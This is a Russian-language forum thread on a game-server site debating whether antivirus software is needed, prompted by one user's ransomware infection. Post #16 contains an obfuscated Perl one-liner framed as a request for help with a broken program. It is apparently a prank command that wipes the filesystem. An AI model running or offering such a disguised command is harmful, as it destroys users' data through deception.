Перейти к содержимому

Высокая работоспособность
Геодата, классы и способности, подземелья и рейды:
всё, как было на официальных серверах!
Без малого 15 лет работы
29 июня нашему проекту исполняется 15 лет,
старейший сервер рунета,
ни одного вайпа за этот срок!
Бесплатно и без доната
Наш проект является полностью бесплатным,
на нём отсутствует покупка игровых ценностей, влияющих на баланс.
Отсутствие лагов
Благодаря 4 мощным серверам и надежному провайдеру
в игре полностью отсутствуют лаги!
Трансфер с других серверов
Приходите к нам со своим персонажем,
воспользуйтесь БЕСПЛАТНОЙ
услугой по переносу персонажа на наш проект!
Высокий онлайн
Онлайн на всех наших мирах РЕАЛЬНЫЙ,
ежесуточно наши миры посещает более
12000 игроков!
Хорошая техподдержка
Четыре сотрудника, отвечающих за решение ваших вопросов,
всегда выслушают и обязательно помогут.
Мы предоставляем действительно качественный сервис!
Начать играть
К системе поощрения активных игроков

Антивирус - За или Против?

• Авторизуйтесь для ответа в теме

Сообщений в теме: 45

#1 Kaktus74

Отправлено 29 октября 2016 - 02:24

Приветствую всех.

Хочу поделиться с вами размышлением по поводу надобности иметь на компе антивирус.
По факту, я порядка трех последних лет не устанавливал на комп никаких версий антивирусов и уже совсем было расслабился на их счет, но вот вчера "грянул гром" и мне удосужилось заразить свою винду весьма экзотической штуковиной..., точно не скажу чем именно, но ее иногда называют - Кодировщиком.

Без лишних подробностей скажу что заимел в сухом остатке:

1. Винда сохранила часть функционала - продолжал работать инет, но не позволялось что либо скачивать ))

2. Папки сохранили свои названия.
3. Все файлы Офиса, Рисунки, Фотки, Фильмы, Музыка..., все это обрело невероятно длинные заголовки (что не позволяло их перемещать), но что более критично - все это перестало быть тем, чем было, а превратилось в нечто нелепое, что невозможно более хоть как-то использовать (полтора терабайта отборного... шлака))

Более того - это одновременно затронуло все разделы и все винты системника (!!!) ))

Как говорится - и смех и грех ))

Немного поспрашивал своих знакомых - как мне поступить и на сколько реально восстановить данные? 

Большинство меня "обнадежили", сказав:

- Теперь уже ничего не вернуть.

Попробовал откатить систему, но не нашлось ни одной точки для восстановления.

Решил просто все напрочь снести и накатить новую 7ку (другой у меня нет а 10ку - даже не хочу).
Винду накатил быстро, но очень много времени трачу на восстановление паролей. Некоторые утратил безвозвратно т.к. хранил их на компе и не делал копии на флешках, Сд или бумаге.

- Не следует во всем полагаться на, привычный всем, Авось и на всякий случай - лучше установить какой либо антивирус.

• 0

Начать играть на EzWoW?
Присоединяйтесь к нашему сообществу!
Играйте на самом работоспособном и стабильном русскоязычном WoW сервере без доната игровых ценностей!

#2 SeregaDv

SeregaDv

Отправлено 29 октября 2016 - 02:31

Есет смарт секьюрити уже стоит лет 5, винда 10, вообще ничем не заморачиваюсь. 

Сообщение отредактировал SeregaDv: 29 октября 2016 - 02:33

• 0

#3 bfg9000k

bfg9000k

Отправлено 29 октября 2016 - 02:53

Приветствую всех.

По факту, я порядка трех последних лет не устанавливал на комп никаких версий антивирусов

Три года пользоваться современным интернетом без антивируса\фаервола-это примерно то же, что три года ходить с немытыми руками, каждый день здороваясь с бомжами-сифилитиками из худших анналов КВД. Надеюсь после этого задумался о сетевой безопасности или как обычно, на авось и "антивирус в 2016 тормозит ПК, 500р в год дорого за лицензию, ой, всё"

Есет смарт секьюрити уже стоит лет 5, винда 10, вообще ничем не заморачиваюсь. 

ЕСЕТ-ОК, сам юзаю на 3-х машинах. Винда 10-АНБ тебе благодарно

• 0

#4 Mortredx

Mortredx

Отправлено 29 октября 2016 - 03:05

а чё винда 10 топ? 

з.ы. стоит панда антивир, мне нравится

Сообщение отредактировал Hamwel: 29 октября 2016 - 03:05

• 1

5cfc3a1c2b0601f8a3c40108f80ef480.png

#5 Pwldd

Отправлено 29 октября 2016 - 03:06

антивирус бесполезная хрень. мне аваста хватило который в 2013 году мне заблокировал доступ к инету из-за того, что я не хотел покупать его лицензию
примерно с того времени никогда не пользовался ими. с учетом того, что сейчас только полный даун поведется на какой-то сайт с левыми загрузчиками под которыми написаны сотни комментариев по типу "Я так давно искал Изнасилование.zip, все классно!!" "У меня просит ввести номер телефона, это нормально? - да, это обычная проверка))"
с того времени ниразу не было проблем с какими-либо вирусами. не считая маил.ру, который вообще в любой проге скачанной с инета может оказаться. в 10ке только он по стандарту стоит, но с переходом на нее(уже года полтора как, или когда она там вышла) - ни разу антивирус не заорал ни на что, кроме активатора для винды

• 3

0e470d34617360839d89d165cf13a80d.png9b7d14bd7ead445d04115444537545c2.png

#6 b0mzh

Отправлено 29 октября 2016 - 03:10

касперский ван лав

ps. из 10ки можно выпилить весь ненужный функционал, тулзы есть.

Сообщение отредактировал b0mzh: 29 октября 2016 - 03:12

• -2
"Timeo Danaos et dona ferentes"

#7 SeregaDv

SeregaDv

Отправлено 29 октября 2016 - 03:15

а чё винда 10 топ? 

з.ы. стоит панда антивир, мне нравится

Хз,  10 уже год стоит вроде,  усё работает

Забыл уточнить,  касперский- отстойный антивир,  как бы его не старались тут обелить. 

• 1

#8 bfg9000k

bfg9000k

Отправлено 29 октября 2016 - 03:31

касперский ван лав

ps. из 10ки можно выпилить весь ненужный функционал, тулзы есть.

даже при выпиле всеми тулзами она всё равно за 7 суток работы будет до 500 мб трафика отправлять. А без ограничений и выпила там 1.5 гб примерно шлёт инфы о юзере на разные серверы. И это при условии, что не пользуешься браузером, а только офисом\плеером. С браузером там ещё веселее сбор инфы будет, как бы не старались выпиливатьи ограничивать службы.

По теме выбора антивируса-здесь скорее предвзято-субъективное мнение. "нет проблем с антивиром-лучший", "были проблемы-говно". При том, что часто достаточно понять в чём проблема антивируса(версия, сборка ОС, кривые руки юзера). Ну не верю я, что крупные компании, которые продают свои антивирусные программные продукты выпускают говно, которое оказывается говном у всех и сразу. Чаще всего, любой глюк-сугубо частный случай. Антивирус или у 95-99% работает сразу из коробки ОК или просто теряет покупателей если на этапе тестов до продаж- писан индуисским кодом, глючит, сбоит и вешает ОС.  Есть просто продукты, которые не подходят под слабые машины, под машины с пиратскими сборками ОС "от Уаси\Звэр\суперэдишн", под модифицированные биосы и прошивки железа и.т.д. Но нет намеренно глючных продуктов от крупных контор. Ну и есть АВАСТ! с его голосом об обновлении баз среди тихой, тёмной ночи

ПС: пятиминутка объективности

Сообщение отредактировал bfg9000k: 29 октября 2016 - 03:32

• 0

#9 SeregaDv

SeregaDv

Отправлено 29 октября 2016 - 04:26

Ну не верю я, что крупные компании, которые продают свои антивирусные программные продукты выпускают говно, которое оказывается говном у всех и сразу. Чаще всего, любой глюк-сугубо частный случай. Антивирус или у 95-99% работает сразу из коробки ОК или просто теряет покупателей если на этапе тестов до продаж- писан индуисским кодом, глючит, сбоит и вешает ОС.  Есть просто продукты, которые не подходят под слабые машины, под машины с пиратскими сборками ОС "от Уаси\Звэр\суперэдишн", под модифицированные биосы и прошивки железа и.т.д. Но нет намеренно глючных продуктов от крупных контор. Ну и есть АВАСТ! с его голосом об обновлении баз среди тихой, тёмной ночи

ПС: пятиминутка объективности

Ниразу не покупал антивирус. Интернет- бесплатный магазин самообслуживания. 

• 0

#10 Unsound

Отправлено 29 октября 2016 - 04:43

Антивирус должен быть установлен на компьютере. Даже если сам не заботишься о собственной безопасности, то обязан думать о других людях, с которыми обмениваешься информацией через диски и флэшки. Это как вопрос гигиены и безопасности секса, либо ты используешь гондоны, либо ты мудак.
С начальным выбором антивируса я бы не парился - в Windows, начиная с 8 версии, уже присутствует встроенный отличный Защитник. А для  Windows 7 есть опять же родной майкрософтовский бесплатный Security Essentials, который скачивается с официального сайта Майкрософт.
Сам я использую Доктор Веб, продляя лицензии уже который год.

Скрытый текст

• 0

#11 1zimrud1

Отправлено 29 октября 2016 - 05:04

Я скажу так.
Резкой парень любишь секс без концертов не вопрос. Но чтоб не заразить других и не потерять свои данные раз в неделю проверьте др. Веб курит утилита бесплатна!
Любишь секс и желаешь хорошую защиту касперский и только лицензия.
Любишь сексуальные хочешь защититься но не очень багат ставь аваст который отсчет простенькие вирусы и раз в 2 недели др. Веб. Курит)
  • -2

#12 jacendi

Отправлено 29 октября 2016 - 05:13

Сижу на линуксе, не знаю за ваши анальные затычки.

• 0

#13 Mr Vint

Mr Vint

Отправлено 29 октября 2016 - 05:21

"Я так давно искал Изнасилование.zip, все классно!!" 

Чет заорал в голос))

• 1

Для винта, все что ниже пятой строчки – дно рекаунта.

f398af3e4b9bdfda8ae81cf8dc77e385.png15390e36f372f3833b4e931612a61784.png

#14 Razbanb men9

Razbanb men9

Отправлено 29 октября 2016 - 05:24

делай как я

раз в месяц качай антивирус, проверяй и удаляй его )

6ой год норм

Сообщение отредактировал Na1v: 29 октября 2016 - 05:25

• 0

#15 bengurwtf

Отправлено 29 октября 2016 - 05:58

сторонник avira ее тут не упоминали(но даже у нее нашел незначительный минус в виде рекламы продуктов).

В альтернативу есть куча утилит, которыми достаточно раз в неделю мониторить комп и жить прекрасно(avz,др.веб).

3 самых главных антивируса- иметь линукс, адблок или не лазить по "ххх сайтам"

Сообщение отредактировал bengurwtf: 29 октября 2016 - 06:00

• 0

ea9498c23f43fc970df1f9cbc88f6d98.png

#16 Rescor

Rescor

Отправлено 29 октября 2016 - 06:28

Не нужен, если есть мозг. Как сказали выше, подцепить вирус сейчас может только даун, запускающий всё подряд или качающий репаки игр от всяких сейтеров и прочих личностей.
Ну и:

Сижу на линуксе, не знаю за ваши анальные затычки.

У меня тут что-то прога не работает, можешь посмотреть, что не так?
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

• 0

#17 region62

Отправлено 29 октября 2016 - 06:34

Приветствую всех.

Хочу поделиться с вами размышлением по поводу надобности иметь на компе антивирус.
По факту, я порядка трех последних лет не устанавливал на комп никаких версий антивирусов и уже совсем было расслабился на их счет, но вот вчера "грянул гром" и мне удосужилось заразить свою винду весьма экзотической штуковиной..., точно не скажу чем именно, но ее иногда называют - Кодировщиком.

1. Винда сохранила часть функционала - продолжал работать инет, но не позволялось что либо скачивать ))

3. Все файлы Офиса, Рисунки, Фотки, Фильмы, Музыка..., все это обрело невероятно длинные заголовки (что не позволяло их перемещать), но что более критично - все это перестало быть тем, чем было, а превратилось в нечто нелепое, что невозможно более хоть как-то использовать (полтора терабайта отборного... шлака))

Более того - это одновременно затронуло все разделы и все винты системника (!!!) ))

Немного поспрашивал своих знакомых - как мне поступить и на сколько реально восстановить данные? 

- Теперь уже ничего не веавливалась рнуть.

Попробовал откатить систему, но не нашлось ни одной точки для восстановления.у

Решил просто все напрочь снести и накатить новую 7ку (другой у меня нет а 10ку - даже не хочу).
Винду накатил быстро, но очень много времени трачу на восстановление паролей. Некоторые утратил безвозвратно т.к. хранил их на компе и не делал копии на флешках, Сд или бумаге.уво

- Не следует во всем полагаться на, привычный всем, Авось и на всякий случай - лучше установить какой либо антивирус.

________________________________ука
Хотелось бы услышать ваше мнение - на счет данной ситуации.
Спасибо.

Ну вот как у меня). Почти. Правда - ситуёвина была хуже - винда вообще не грузилась... И не восстанавливалась из образа. Благо - нашла древний диск вин7 сборка непонятная)) из нее восстановила систему. Правда диск Д сдох. Мудохалась часов 7. Потом нашла проблему - каспер сука)). удалила и все норм.

• 0

#18 swsprogaming

Отправлено 29 октября 2016 - 08:04

Приветствую всех.

- Теперь уже ничего не вернуть.

Попробовал откатить систему, но не нашлось ни одной точки для восстановления.

Винду накатил быстро, но очень много времени трачу на восстановление паролей. Некоторые утратил безвозвратно т.к. хранил их на компе и не делал копии на флешках, Сд или бумаге.

По своему опыту скажу следующее: От шифратора тебя никто не спасет, нужно просто внимательно смотреть что качаешь, откуда качаешь, и расширения/вес файла учитывать. 7 лет MSE(Microsoft Security Essentials) или уже после 8 винды и выше "Защитник Windows" у меня вполне справляется с задачей, и еще не одного червя не проползло мимо) Не смотря на то что халява)

Загрузка Security Essentials
  • 0

#19 Xoxoxol

Отправлено 29 октября 2016 - 09:23

по своему опыту:

1) антивирь нужен всегда

2) 3 года стоит есет нод

Он тоже ни о чем не кричит, за что его и выбрал. Он тупо блочит то что считает подозрительным, и пока (за 3 года) ни разу не ошибся.Лажу в инете с самыми дибильными запросами, качаю кучу софта с оевых сайтов, качаю кряки с сайтов с кряками. и прочее. В общем для себя вопрос с антивирусом и вирусами закрыл 3 года назад с уствновкой есет нод, я просто забыл об угрозе и полностью на него положился. До этого был МСЕ, был даже аваст, из хороших был еще Симантек.

На сайте ДРвеб есть сервис для расшифровки файлов.

• 0

just Hoholl

#20 wowinyaface

Отправлено 29 октября 2016 - 09:48

есть еще одна вещь, которая поможет законтрить шифровальщики без ав - бэкап

• 0
Of course, if you suck as pvper, you will still suck using Shadowmourne, but you will suck better, faster, harder and more creatively than ever before! ©

Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 скрытых пользователей

UCaller Visa Mastercard Paypal Qiwi Robokassa Yookassa
Договор-оферта Условия возврата Условия обработки данных
Подробности - о сервере?
Играй на нашем сервере!
Бесплатный сервер WoW 3.3.5 Wrath of the Lich King - уже 17 лет мы радуем наших игроков, присоединяйся к ним!
Без доната! Всё работает!
Нет - продаже предметов, влияющих на игровой процесс. Да - высокой работоспособности - проверь!

Система лояльности

За внутриигровую активность Вы будете получать Сферы Лояльности, которые автоматически конвертируются в бонусы для покупок в магазине сервера:

• Победа в матче на Арене: 15% от текущего рейтинга;
    (т.е. примерно 300 при рейтинге в 2000)
  • Победа в сражении на Полях Боя: 12.5% от текущего рейтинга;
    (т.е. примерно 500 при рейтинге в 4000)

(только при использовании системы Поиска Подземелий)

(только актуальные рейдовые подземелья - ЦЛК, РС и ИВК)

За каждые 100 Сфер Лояльности Вы получаете 1 бонусный рубль, который можете использовать для полной или частичной оплаты чего-нибудь нужного из магазина.

Участие в особом событии - Цареубийстве!

Кажд (для игроков Альянса) и кажд (для игроков Орды) с 16:00 до 22:00 (по московскому времени) проводится особое событие - Цареубийство!

Достаточно убить одного из предводителей противоположной фракции и получить награду: 2000 Сфер Лояльности! Следите за уведомлениями в чате...

Еженедельно можно получить 15000 Сфер Лояльности, после достижения данного значения бонусы за вышеперечисленные действия начисляться не будут.